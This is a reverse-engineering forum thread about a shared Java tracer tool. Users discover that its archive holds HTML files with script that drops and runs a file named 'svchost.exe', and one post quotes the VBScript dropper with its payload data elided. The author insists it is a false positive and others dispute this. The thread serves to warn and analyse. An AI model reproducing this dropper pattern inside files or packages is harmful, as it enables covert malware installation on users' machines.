Exetools

Exetools (https://forum.exetools.com/index.php)
-   Community Tools (https://forum.exetools.com/forumdisplay.php?f=47)
-   -   Tracer v2 (https://forum.exetools.com/showthread.php?t=18595)

CodeCracker 01-09-2018 23:19
Tracer v2
 
Tracer v2
Java tracer, this time as a standalone jar,
Just select a Jar and an output text file,
click Trace, and wheel that's it!
classes which start with "java." can't be logged!

Download link:
http://www18.zippyshare.com/v/qhcVnrK0/file.html

Kerlingen 01-11-2018 01:33
This file contains a VIRUS !!!

No, it's no false positive. There are at least seven HTML files "package.html" inside which contain JavaScript to drop a file called "svchost.exe"

cybercoder 01-11-2018 20:33
Yep actually looks pretty dodgy, seems to try and use vbscript to drop svchost.exe

--<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = ......

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</SCRIPT>

Haven't actually checked out the file that is to be dropped yet.

Zeokat 01-15-2018 23:28
I could read same report at another forum and CodeCracker replied saying that is a false positive. But... i still have my doubts :rolleyes:

CodeCracker 01-17-2018 04:58
False positive due to some htmls present under jar archive.
If you already runed the jar file don't be alarmed since the html
are not executed, and not even used.
Htmls removed, check:
http://www18.zippyshare.com/v/qhcVnrK0/file.html

sendersu 01-17-2018 20:56
so who and why the hell added malware html into your archives?

Kerlingen 01-18-2018 01:26
Quote:
Originally Posted by CodeCracker (Post 111917)
False positive
Please, read the definition before stating something obviously wrong:
Quote:
A false positive error, or in short a false positive, commonly called a "false alarm", is a result that indicates a given condition exists, when it does not.
The fact that the malware doesn't execute just by downloading doesn't make it a false positive.

Or would you call the ebolavirus "false positive" just because it's contained inside a glass phial?

rooster1 07-17-2018 01:24
@CodeCracker can this be used for a jar file that is launched with an EXE file?

CodeCracker 07-17-2018 02:20
It can trace only jars
 
Quote:
Originally Posted by rooster1 (Post 114021)
@CodeCracker can this be used for a jar file that is launched with an EXE file?
No, it can trace only jars currently, the main reason is that it uses asm objectweb to inject trace commands on classes,
You could try JavaClassManager
https://forum.exetools.com/showthread.php?t=18592
to try to save loaded classes.
JavaClassManager can launch both jar and exe extensions,
it is just a matter of intercepting class loading and editing classes to do what you want.

rooster1 07-17-2018 03:53
Thanks for the guidance bro. i will try your recommendation :)
peace


All times are GMT +8. The time now is 23:56.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX